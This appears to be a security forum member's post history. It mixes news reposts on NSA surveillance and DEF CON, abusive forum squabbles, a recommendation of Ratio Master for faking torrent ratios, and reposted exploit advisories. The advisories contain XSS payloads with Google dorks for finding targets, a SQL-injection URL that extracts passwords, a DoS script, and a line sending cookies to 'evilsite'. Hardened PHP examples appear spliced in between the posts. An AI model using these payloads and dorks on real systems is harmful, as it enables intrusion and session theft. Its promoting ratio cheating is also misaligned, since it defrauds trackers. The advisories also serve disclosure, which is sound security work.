Matt

Everything posted by Matt

  1. DEF CON 21

    Jeff Moss - the US government security advisor who founded the DEF CON hacking convention - has urged federal agents to stay away from the conference next month in Vegas. For the first time in the annual conference's 20-year history, g-men and spooks have been made unwelcome. Exactly how effective the request will be remains to be seen.

    Moss's anti-invitation was laid out in a note posted on the DEF CON website titled Feds, We Need Some Time Apart. And it reads like a text from someone who has realised an acquaintance they invite to a big blowout party every year has either been stealing from their stash or been especially mean to their other friends*:

    Moss, aka Dark Tangent, was appointed to the US government's Homeland Security Advisory Council by President Obama in 2009, and is chief security officer for internet overlord ICANN. He also founded the DEF CON and Black Hat computer security conferences. It's presumed Moss's warning was in part sparked by recent revelations about the NSA and its monitoring of the world's internet connections - see the bootnote below.

    Feds are welcome to turn up to the top hacking conventions, provided they're transparent about it and can put up with a little ribbing from attendees. But perhaps in light of recent events, the presence of any g-men could spoil the atmosphere.

    Among the security experts and hacker types who have reflected on the DEF CON blog post, some think the ban won't be enforced and the invitation is purely for show; others think it's a sensible move towards defusing potential antagonism that might otherwise spoil the whole event for everyone.

    "I wonder if this means that the Feds will be escorted out of DEF CON, like those reporters who fail to register themselves as such," mulled Jeremiah Grossman, founder and CTO of WhiteHat Security, in a Twitter update.

    Robert Graham of Errata Security has a characteristically thoughtful blog post supporting the cooling-off move.

    "A highly visible fed presence is likely to trigger conflict with people upset over Snowden-gate," Graham wrote. "From shouting matches, to physical violence, to 'hack the fed', something bad might occur. Or, simply attendees will choose to stay away. Any reasonable conference organizer, be they pro-fed or anti-fed, would want to reduce the likelihood of this conflict.

    "The easiest way to do this is by reducing the number of feds at DEF CON, by asking them not to come. This is horribly unfair to them, of course, since they aren't the ones who would be starting these fights. But here's the thing: it's not a fed convention but a hacker party. The feds don't have a right to be there -- the hackers do. If bad behaving hackers are going to stir up trouble with innocent feds, it's still the feds who have to go."

    Tor developer and longtime NSA critic Jacob Applebaum called on other conferences to follow suit.

    "I hope #OHM2013 makes a statement similar to #DefCon - the feds and cops won't follow it but saying it sets expectations," he said in a Twitter update.

    Applebaum's post is a reference to OHM2013: Observe. Hack. Make. which is due to take place between 31 July and 4 August in Amsterdam, the Netherlands.

    BSides and Black Hat events will also be held in Vegas in the run-up to this year's DEF CON. Federal agents are welcome at both of these conferences, at least at the time of writing. In fact the opening day keynote at Black Hat is due to be delivered by General Keith Alexander, the head of the NSA. DEF CON is due to start the day after, running from 1 to 4 August at the Rio Hotel and Casino.

    Vegas promises to be action all the way over the next few weeks. ®

    Source: TheRegister.co.uk
  2. There are red faces in Redmond after Edward Snowden released a new batch of documents from the NSA's Special Source Operations (SSO) division covering Microsoft's involvement in allowing backdoor access to its software to the NSA and others.

    Documents seen by The Guardian detail how the NSA became concerned when Microsoft started testing Outlook.com, and asked for access. In five months Microsoft and the FBI created a workaround that gives the NSA access to encrypted chats on Outlook.com. The system went live in December last year – two months before Outlook.com's commercial launch.

    Those Outlook users not enabling encryption get their data slurped as a matter of course, the documents show. "For Prism collection against Hotmail, Live, and Outlook.com emails will be unaffected because Prism collects this data prior to encryption," an NSA newsletter states.

    Microsoft's cloud storage service SkyDrive is also easy to access, thanks to Redmond's work with the NSA. The agency reported on April 8, 2013 that Microsoft has built PRISM access into Skydrive in such a way as to remove the need for NSA analysts to get special authorization for searches in Microsoft's cloud.

    "Analysts will no longer have to make a special request to SSO for this – a process step that many analysts may not have known about," the leaked NSA document states. "This new capability will result in a much more complete and timely collection response. This success is the result of the FBI working for many months with Microsoft to get this tasking and collection solution established."

    The documents also detail how Microsoft and Skype have also been working with the intelligence agencies to install monitoring taps. Work began on integrating Prism into Skype in November 2010, they state, three months before the company was issued with an official order to comply by the US Attorney General.

    Data collection began on February 6, 2011, and the NSA document says the planned systems worked well, with full metadata collection enabled. It praised Microsoft for its help, saying "collaborative teamwork was the key to the successful addition of another provider to the Prism system."

    Work to integrate Skype into Prism didn't stop there, however. In July 2012 an NSA newsletter states Microsoft installed an upgrade that tripled the amount of Skype videos that can be monitored by NSA analysts. "The audio portions of these sessions have been processed correctly all along, but without the accompanying video. Now, analysts will have the complete 'picture'," it says.

    In a statement, Microsoft said that it only complies with legal demands for customer information for law enforcement and national security purposes, and that the company isn't involved in giving "the kind of blanket orders discussed in the press over the past few weeks."

    "When we upgrade or update products legal obligations may in some circumstances require that we maintain the ability to provide information in response to a law enforcement or national security request. There are aspects of this debate that we wish we were able to discuss more freely," it said.

    Not that Microsoft hasn't been making a big thing about the privacy of its communications systems in the past. Its Gmail Man ad campaign lambasted Google for snooping in people's mail to match them with advertisers, and the tagline "Your email is your business" seems somewhat ironic these days. The advert is no longer on Microsoft's YouTube channel.

    The leaked documents come from the NSA's Special Source Operations (SSO) division, which handles commercial company liaison for data collection by the agency. The documents show that, once collected by Prism, the NSA shares its data directly with the CIA and FBI via a custom application. "The FBI and CIA then can request a copy of Prism collection of any selector..." the document says. "These two activities underscore the point that Prism is a team sport!"

    In a joint statement, Shawn Turner, spokesman for the director of National Intelligence, and Judith Emmel, spokeswoman for the NSA, told The Guardian that the wiretapping referred to in the document was court-ordered and was subject to judicial oversight.

    "Not all countries have equivalent oversight requirements to protect civil liberties and privacy," they said. "In practice, US companies put energy, focus and commitment into consistently protecting the privacy of their customers around the world, while meeting their obligations under the laws of the US and other countries in which they operate." ®

    Source: TheRegister.co.uk
  3. Post-Snowden sensitivities to American spookery have been further inflamed after Australian website Crikey revealed a document that it says is a contract between the Federal Bureau of Investigation, the US Department of Justice and submarine cable operator Reach that allows the US entities to tap Reach's cables for national security purposes.

    The document's making waves because it is easy to verify - (PDF) it is dated November 29th, 2001, and bears the signatures of Deputy Assistant Attorney General John G Malcolm and FBI General Counsel Larry R. Parkinson. A web search quickly produces little reason to doubt their signatures are genuine, while this document (PDF) appears to be a superset of the one Crikey found and looks decently official. Another signatory, Alex Arena of Reach's half-owner Pacific Century CyberWorks (PCCW), also likely worked for that company at the time.

    But it's also easy to find documents that carry identical terms and conditions, such as this one (PDF) signed by carrier TerreStar. We can therefore set aside any conclusion that the documents represent new revelations into the US spookery apparatus.

    But they remain of interest, for two reasons.

    The first is that at the time the deal was signed, Reach was half-owned by Australia's dominant Telstra, which at the time had the government of Australia as its majority shareholder. The document therefore represents, if one looks at it in just the right way, one government giving another the right to inspect traffic and store data carried by an entity it owns. Throw in the fact that Australia's government of the day was a very, very, firm US ally and things get even more interesting.

    The second notable element is that the document offers more detail about how the USA's intelligence agencies go about their business. The TerreStar document is text and the Reach document is a scan, so in the name of authenticity it's best if we bring you screen grabs of its contents rather than transcribing it. If you want to verify the text, the TerreStar document gives you the chance to do so.

    Here's a telling clause on data retention:

    Here's an example of what the FBI and DoJ expected Reach would "have the ability to provide in the United States," if and when asked nicely.

    Little seems to have changed from the time of the Reach document's signing, 2001, and the 2009 date on the TerreStar document.

    In these post-Snowden times, it's not hard to suggest the document looks like another smoking gun for those building a case that US snooping knows no bounds and no shame. Throw in the fact that the Reach document was signed just weeks after 9/11 and conspiracy-lovers may get even foamier, although the missing signature from Telstra may cool that ardour.

    A sounder conclusion could be that this is more or less a pro forma document, albeit a pro forma that confirms the US is peering into all sorts of stuff.

    One last thing to consider: PCCW now operates UK Broadband, provider of the Now wireless broadband service. We're sure its customers will be interested to know its owner has form signing up for snooping charters. ®

    Source: TheRegister.co.uk
  4. HP has teamed up with Microsoft to provide hardware and software tools that simplify companies' transition away from the Windows XP operating system, whose support will be withdrawn in April 2014.

    Although support for Windows XP will be withdrawn in less than 10 months, 40% of companies have not yet deployed an alternative operating system, according to a study carried out by HP. Research firm Gartner has estimated that more than 15% of medium and large enterprises will still be running Windows XP on at least 10% of their PCs after Microsoft withdraws support for the operating system next year.

    In April this year, Microsoft posted a warning on its website: "If your organisation has not yet started migrating to a modern desktop, you are late." The average enterprise deployment can take between 18 and 32 months, and analysts have warned that companies without a Windows XP migration plan risk running into problems.

    "Many companies have avoided the XP migration, fearing a lack of compatibility and lost productivity during the transition process," said Enrique Lores, senior vice president and general manager of commercial PCs at HP.

    Organisations that continue to use Windows XP after support is withdrawn will incur additional costs for developing security software patches, to prevent the security problems that could arise once Microsoft withdraws support, HP warned. Migrating to a new platform such as Windows 7 can help companies reduce their technical support needs by up to 70% per PC and save 700 dollars per user annually, the HP study found.

    According to a paper titled "Why tying yourself to Windows XP is a bad idea", IDC estimated that firms can halve their lost-productivity costs per PC by migrating off Windows XP. For every 230 PCs, the transition to Windows 7 would free up the equivalent of one full-time resource, IDC indicates.

    While HP products will help companies migrate to a more recent version of Windows, HP Financial Services (HPFS) will provide assistance so that the whole process can be carried out with minimal up-front investment, Lores added. The financial services offerings provide customers with easy payment plans for a simplified transition from Windows XP. The company also offers consultancy and support services for companies at all stages of the Windows XP transition.

    Microsoft welcomed HP's investment, which lets customers migrate off the popular XP. "By working with a company like HP, companies can immediately start realising the benefits of Windows 8 and Windows 7," said Erwin Visser, general manager of Windows at Microsoft.

    Source: ComputerWeekly.com | Information Technology (IT) News, UK IT Jobs, Industry News
  5. Hack site

    So you understand better what the guys above are saying: 4. Some categories have internal rules. Check whether there is a sticky rulebook before posting in a particular category. In particular the categories "CERERI" (minimum 10 QUALITY posts), "AJUTOR" (minimum 10 QUALITY posts) or "Bloguri și Bloggeri" (minimum 50 QUALITY posts). Then, for what you want, go here: https://rstforums.com/forum/71396-rst-pentesting-academy.rst Get to studying and you'll be able to "hack" a site. Cheers.
  6. It won't. In Romania almost all of us use Filelist and maybe, to a lesser extent, SceneFZ. These two trackers seem exceptional to me and it's impossible not to have a decent ratio. Ratio Master works; I don't know whether it does on Romanian trackers too, but many have said it works. I said this program works perfectly on trackers like IPTorrents, Speed.cd, Torrentday.
  7. Explain to the dimwit above as well that the program isn't garbage, it's just that he's too weak to build up a ratio.
  8. Does the truth hurt? Buddy, you're butting in for no reason and you might get burned. You're too stupid to understand the point of the posts I made. You're too stupid to realise that those posts are for idiots like you who have nothing to do and waste time on RST just to make 100 request topics. You're too stupid to open those posts I made and see that I take no credit for them and that they are only informative. I don't answer to you for my posts. My posts are of higher quality than your hundreds of requests, like a poor beggar. You're too stupid to write correctly. Notice "dale". I hope you get banned because.. YOU'RE TOO STUPID.
  9. Well, if it beats you, how can you say it's garbage? Do you even know how the ratio is calculated? 90% of this forum knows what Ratio Master is. Stop giving your opinion on something if you're a dimwit and it beats you.
  10. Description: The vBulletin vBShout module suffers from a stored cross site scripting vulnerability.
    Author: []0iZy5
    Source: vBulletin vBShout Cross Site Scripting - Packet Storm
    Code:

    ##########################################################################################
    #
    # Exploit Title: vBShout vBulletin - Stored XSS Vulnerability
    # Google Dork: intext:vBShout
    # Date: 10.07.2013
    # Exploit Author: []0iZy5
    # Vendor Homepage: www.backtrack-linux.ro
    # Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?do=product&productid=2
    # Version: vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x
    # Tested on: Linux & Windows
    #
    ##########################################################################################
    #
    # Stage 1: Go to -> UserCP -> Custom Commands
    # (Direct Link:) http://127.0.0.1/[path]/vbshout.php?do=profile&action=customcommands
    #
    # Stage 2: Add a malicious hash tag.
    # (Example:) "><script>alert(document.cookie)</script>
    #
    ##########################################################################################
    #
    # This was written for educational purpose only. use it at your own risk.
    # Author will be not responsible for any damage caused! user assumes all responsibility.
    # Intended for authorized web application pentesting only!
    #
    ##########################################################################################
  11. Description: iVote version 1.0.0 suffers from a remote SQL injection vulnerability.
    Author: Ashiyane Digital Security Team
    Source: iVote 1.0.0 SQL Injection - Packet Storm
    Code:

    # Exploit Title: iVote Sql Injection
    # Google Dork: inurl:details.php?id=
    # Date: 2013 July 11
    # Exploit Author: Ashiyane Digital Security Team
    # Software Link: http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/
    # Version: 1.0.0
    # Tested on: Linux CentOS , Linux Ubuntu , Windows 8

    vulnerability: details.php on line 5

    $id = $_GET['id'];
    $selectc = mysql_query("SELECT * FROM comments WHERE id = $id");
    $select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");
    $row = mysql_fetch_array($select);

    ///////////////////////////////////////
    Example:
    http://example.com/iVote/details.php?id=1 union select 1,password,3,4 from settings
    ///////////////////////

    TNX : Rz04 & Crypt0
    I Love Iran & all IRanian Black Hats
    I'm , Bi Edea (R3za)
    Email : momtane666@yahoo.com
    Gmail : kafaran.blackhats@Gmail.com
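A hardened counterpart of the details.php fragment quoted in the advisory above, added here as an illustration; it is not iVote's code and not part of the Packet Storm post. It assumes a PDO connection in place of the mysql_* functions, and the host, database name and credentials are placeholders.

```php
<?php
// Added example, not iVote's code. Hardened counterpart of the details.php lines
// quoted in the advisory: the id is validated as an integer and bound as a
// query parameter, so a value like "1 union select ..." is never spliced into
// the SQL text. Assumes PDO (the original used the mysql_* functions).

/**
 * Load the vote row and its comments for one poll id.
 *
 * @param PDO   $db    open PDO connection (assumed)
 * @param mixed $rawId the raw value of $_GET['id']
 * @return array{vote: array|false, comments: array}
 * @throws InvalidArgumentException when the id is not a non-negative integer
 */
function loadVoteDetails(PDO $db, $rawId): array
{
    // Check the shape of the value first: anything that is not a plain
    // non-negative integer ("1 union select ...", "1 or 1=1", "") is rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a non-negative integer');
    }

    // Prepared statements keep the SQL text and the data separate; the driver
    // never interprets the bound value as SQL. This, not the integer check
    // alone, is the fix for the injection.
    $votes = $db->prepare('SELECT * FROM votes WHERE V_Id = :id');
    $votes->bindValue(':id', $id, PDO::PARAM_INT);
    $votes->execute();
    $vote = $votes->fetch(PDO::FETCH_ASSOC);

    $comments = $db->prepare('SELECT * FROM comments WHERE id = :id');
    $comments->bindValue(':id', $id, PDO::PARAM_INT);
    $comments->execute();

    return ['vote' => $vote, 'comments' => $comments->fetchAll(PDO::FETCH_ASSOC)];
}

// details.php entry point; host, database and credentials are placeholders.
$db = new PDO('mysql:host=localhost;dbname=ivote;charset=utf8mb4', 'DB_USER', 'DB_PASSWORD', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);

try {
    $details = loadVoteDetails($db, $_GET['id'] ?? '');
    $row = $details['vote']; // same variable the original page went on to use
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('invalid id');
}
```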
  12. Description: The vBulletin Advanced User Tagging module suffers from a stored cross site scripting vulnerability.
    Author: []0iZy5
    Source: vBulletin Advanced User Tagging Cross Site Scripting - Packet Storm
    Code:

    ##########################################################################################
    #
    # Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
    # Google Dork: intext:usertag_pro
    # Date: 10.07.2013
    # Exploit Author: []0iZy5
    # Vendor Homepage: www.backtrack-linux.ro
    # Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
    # Version: vBulletin 3.8.x, vBulletin 4.x.x
    # Tested on: Linux & Windows
    #
    ##########################################################################################
    #
    # Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
    # (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
    #
    # Stage 2: Add a malicious hash tag.
    # (Example:) "><script>alert(document.cookie)</script>
    #
    ##########################################################################################
    #
    # This was written for educational purpose only. use it at your own risk.
    # Author will be not responsible for any damage caused! user assumes all responsibility.
    # Intended for authorized web application pentesting only!
    #
    ##########################################################################################
  13. Description: Jolix Media Player version 1.1.0 suffers from a denial of service vulnerability.
    Author: IndonesiaGokilTeam
    Source: Jolix Media Player 1.1.0 Denial Of Service - Packet Storm
    Code:

    #!/usr/bin/python
    # Python 2 script: writes an .m3u playlist made of 1000 'A' bytes; opening it
    # in the affected player triggers the crash described above.
    print """
    [+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit
    [+]Celah versi: Version 1.1.0
    [+]Mengunduh produk: [url]http://www.jolixtools.com/downloads/jolix-media-player-setup.exe[/url]
    [+]Hari Tanggal Tahun: 09.07.2013
    [+]Penulis: IndonesiaGokilTeam
    [+]Dicoba di sistem operasi: Windows xp sp 3
    """
    sampah = "\x41" * 1000   # 1000 x 'A'
    ledakan = sampah         # the playlist payload
    try:
        rst = open("SampahMasyarakat.m3u", 'w')
        rst.write(ledakan)
        rst.close()
        print("\nFile Sampah Masyarakat dibuat !\n")
    except:
        print "Gagal"
  14. Description: Project Pier version 0.8.8 suffers from cross site scripting and cookies that fail to set HttpOnly and Secure flags.
    Author: Carl Benedict
    Source: Project Pier 0.8.8 XSS / Insecure Cookies - Packet Storm
    Code:

    Summary
    --------------------
    Software  : ProjectPier
    Version   : 0.8.8 (other versions untested)
    Website   : http://www.projectpier.org
    Issue     : XSS (stored), Insecure Cookie storage
    CVSS Base : (AV:N/AC:M/Au:S/C:C/I:C/A:N)
    CVSS Score: 7.9
    Researcher: Carl Benedict

    Product Description
    --------------------
    ProjectPier is a Free, Open-Source, PHP web application for managing tasks, projects and teams through an intuitive web interface.

    Details
    --------------------
    The ProjectPier web application is affected by stored XSS and insecure cookie storage. The combination of these two vulnerabilities can lead to full compromise of application credentials by stealing session cookies. The stored XSS can be found in the Contact Name, Contact Company Name, Contact Description fields.

    Proof of Concept
    --------------------
    Entering any of the following strings into the Contact Name, Contact Company Name, and Company Description fields will generate a JavaScript alert dialog when viewing Contacts:

    <script>alert(1)</script>
    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

    Cookie insecurity:
    The session cookies are not protected by the HttpOnly or Secure flags, allowing them to be accessed via JavaScript and sent over HTTP.

    Basic JavaScript alert, returning cookie values:
    <script>alert(document.cookie)</script>

    JavaScript that sends all cookie values to 'http://evilsite' for logging and reuse on the attacker side:
    <script>var url1 = "<img src=http://evilsite/" + encodeURIComponent(document.cookie) + ">"; document.writeln(url1); </script>

    History
    --------------------
    11/07/2012 : Initial contact
    11/07/2012 : Vendor response. Fix planned
    11/12/2012 : Update requested
    05/21/2013 : No updates. Advisory released

    References
    --------------------
    Bug Report : http://www.projectpier.org/node/4520
    Screen Shot: http://www.projectpier.org/files/issues/ppci.jpg
    Screen Shot: http://www.projectpier.org/files/issues/ppci2.jpg
    Screen Shot: http://www.projectpier.org/files/issues/ppxss.jpg
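The two fixes this advisory calls for, output encoding at the HTML boundary and a session cookie carrying HttpOnly and Secure, cover the vBulletin stored XSS posts above (items 10 and 12) as well, so one illustration serves all three. Added example, not Project Pier's or vBulletin's code; it assumes PHP 7.3 or later for the array form of session_set_cookie_params(), and the sample row is constructed from the advisory's own proof-of-concept strings.

```php
<?php
// Added example, not Project Pier's or vBulletin's code. Two fixes the advisory
// calls for: (1) encode stored user input when it is written into HTML, so a
// contact name like <script>alert(1)</script> renders as literal text, and
// (2) issue the session cookie with HttpOnly and Secure, so document.cookie
// cannot read it and it is never sent over plain HTTP.
// Assumes PHP >= 7.3 (array form of session_set_cookie_params).

function e(string $value): string
{
    // ENT_QUOTES also encodes ' and ", which keeps the value inert inside
    // attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderContactRow(array $contact): string
{
    // The fields are stored verbatim; encoding belongs at the HTML boundary,
    // not at input time, so the stored data stays intact for other consumers.
    return '<tr><td>' . e($contact['name']) . '</td>'
         . '<td>' . e($contact['company']) . '</td>'
         . '<td>' . e($contact['description']) . '</td></tr>';
}

function startHardenedSession(): void
{
    session_set_cookie_params([
        'lifetime' => 0,      // session cookie, discarded when the browser closes
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,   // never sent over plain HTTP
        'httponly' => true,   // not readable through document.cookie
        'samesite' => 'Lax',  // not sent on cross-site POSTs
    ]);
    session_start();
}

// Constructed sample row built from the proof-of-concept payloads above; the
// percent-encoded variant is decoded the way the application would see it.
$sample = [
    'name'        => '<script>alert(1)</script>',
    'company'     => rawurldecode('%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e'),
    'description' => '<script>alert(document.cookie)</script>',
];

startHardenedSession();            // must run before any output is sent
echo renderContactRow($sample);    // every cell is emitted as encoded text, not markup
```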
  15. Description: Cisco Linksys E1200 and N300 devices suffer from a cross site scripting vulnerability.
    Author: Carl Benedict
    Source: Cisco Linksys E1200 / N300 Cross Site Scripting - Packet Storm
    Code:

    Summary
    --------------------
    Software  : Cisco/Linksys Router OS
    Hardware  : E1200 N300 (others currently untested)
    Version   : 2.0.04 (others currently untested)
    Website   : http://www.linksys.com
    Issue     : Reflected XSS
    Severity  : Medium
    Researcher: Carl Benedict (theinfinitenigma)

    Product Description
    --------------------
    The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.

    Details
    --------------------
    The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.

    Sample URL #1 (HTTP GET request):
    http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27

    Sample URL #2 (HTTP GET request):
    http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

    History
    --------------------
    04/26/2013 : Discovery
    04/27/2013 : Advisory released
  16. Description: Air Drive Plus version 2.4 for iOS suffers from local file inclusion, script inclusion, and remote arbitrary file upload vulnerabilities.
    Author: Benjamin Kunz Mejri
    Source: Air Drive Plus 2.4 LFI / XSS / File Upload - Packet Storm
    Code:

    Title:
    ======
    Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability

    Date:
    =====
    2013-07-09

    References:
    ===========
    http://www.vulnerability-lab.com/get_content.php?id=1000

    VL-ID:
    =====
    1000

    Common Vulnerability Scoring System:
    ====================================
    6.7

    Introduction:
    =============
    Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.

    Features ...
    [Server] function
    Easily access your files from any web browser. Easily upload and download your photo from photo libraries via web browser.
    [My Files] function
    Preview/Move/Copy/Delete/Unzip/Rename/Email file and Create new directory on your iPhone, iPod touch & iPad.
    Image: png, jpg, gif
    Document: Word, PowerPoint, Excel, PDF
    Compressed: zip
    Text-base: txt, html, php, js, css
    Media: mp3, wav, mp4, mov
    Save Word, PowerPoint, Excel and PDF files from other apps to Air Drive, include Apple's Email app and Safari. Open All types of file from Air Drive to other apps such as Dropbox.
    [Settings] function
    Add Password to prevent unauthorized access to your files. Customize the Server port and Real-time On/Off the sharing functions and takes effect immediately to restrict the access from web browser

    (Copy of the Homepage: https://itunes.apple.com/de/app/air-drive-plus-your-file-manager/id422806570 )

    Abstract:
    =========
    The Vulnerability Laboratory Research Team discovered a remote file include vulnerability in the Air Drive Plus 2.4 application (Apple iOS - iPad&iPhone).

    Report-Timeline:
    ================
    2013-07-09: Public Disclosure (Vulnerability Laboratory)

    Status:
    ========
    Published

    Affected Products:
    ==================
    Apple AppStore
    Product: Air Drive Plus 2.4

    Exploitation-Technique:
    =======================
    Remote

    Severity:
    =========
    High

    Details:
    ========
    A local file include and arbitrary file upload web vulnerability is detected in the Air Drive Plus 2.4 application (Apple iOS - iPad&iPhone). The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on application-side of the service.

    The vulnerability is located in the file upload/add (AirDriveAction_file_add) module of the web-server (http://localhost:8000/) when processing to request a manipulated filename via POST. The injected file will be accessible via the index listing module of the application. Remote attackers can exchange the filename with a double or triple extension via POST method to bypass the upload validation and filter process. After the upload the attacker accesses the file with one extension and exchanges it with the other one to execute for example php codes.

    A persistent script code injection is detected in the filename parameter. Attackers can tamper the request and exchange the file name with persistent malicious script code or tags. The code will be executed in the main index site when processing to list the object (file) items. Attackers are also able to inject persistent code with local frame requests to unauthorized access application data/apps or restricted application information. The execution of the persistent code also occurs when an application user is processing to delete the malicious context. The injected code is stored and will be executed from the delete notification and protection message.

    Exploitation of the vulnerability requires no user interaction and also no privileged application user account (no password standard). Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

    Vulnerable Application(s):
    [+] Air Drive Plus 2.4 - ITunes or AppStore (Apple)

    Vulnerable Module(s):
    [+] File Upload (Web Server) [Remote]

    Vulnerable File(s):
    [+] AirDriveAction_file_add

    Vulnerable Parameter(s):
    [+] filename

    Affected Module(s):
    [+] Application Index Listing (http://localhost:8000/)

    Proof of Concept:
    =================
    The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account and also without user interaction. For demonstration or reproduce ...

    1.1
    <tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" href="http://192.168.2.104:8000/AirDriveAction_file_show/;/private/var/mobile/Applications">;/private/var/mobile/Applications/</a></td>
    <td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center">
    <a onclick="javascript:delfile("/private/var/mobile/Applications");" class="transparent_button">Delete</a></td></tr>

    1.2
    <tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" href="http://192.168.2.104:8000/AirDriveAction_file_show/1337.png.gif.php.js.html">1337.png.gif.php.js.html</a></td>
    <td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile("1337.png.gif.php.js.html");" class="transparent_button">Delete</a></td></tr>

    1.3
    <tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" href="http://192.168.2.104:8000/AirDriveAction_file_show/[PERSISTENT INJECTED SCRIPT CODE!]1337.png">[PERSISTENT INJECTED SCRIPT CODE!]1337.png</a></td><td>27,27KB</td><td align="center">
    2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile("[PERSISTENT INJECTED SCRIPT CODE!]1337.png");" class="transparent_button">Delete</a></td></tr>

    --- Session Request Log ---
    Status: 302[Found]
    POST http://localhost:8000/AirDriveAction_file_add
    Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[83] Mime Type[text/html]
    Request Headers:
    Host[localhost:8000]
    User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
    Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
    Accept-Language[en-US,en;q=0.5]
    Accept-Encoding[gzip, deflate]
    DNT[1]
    Referer[http://localhost:8000/index_files.html]
    Connection[keep-alive]
    Post Data:
    POST_DATA[-----------------------------228191371227676
    Content-Disposition: form-data; name="uploadfile"; filename=";/private/var/mobile/Applications/1337.png"

    Reference(s):
    http://localhost:8000/AirDriveAction_file_add

    Risk:
    =====
    The security risk of the arbitrary file upload vulnerability and the multiple extensions issue are estimated as high(+).

    Credits:
    ========
    Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)

    Disclaimer:
    ===========
    The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
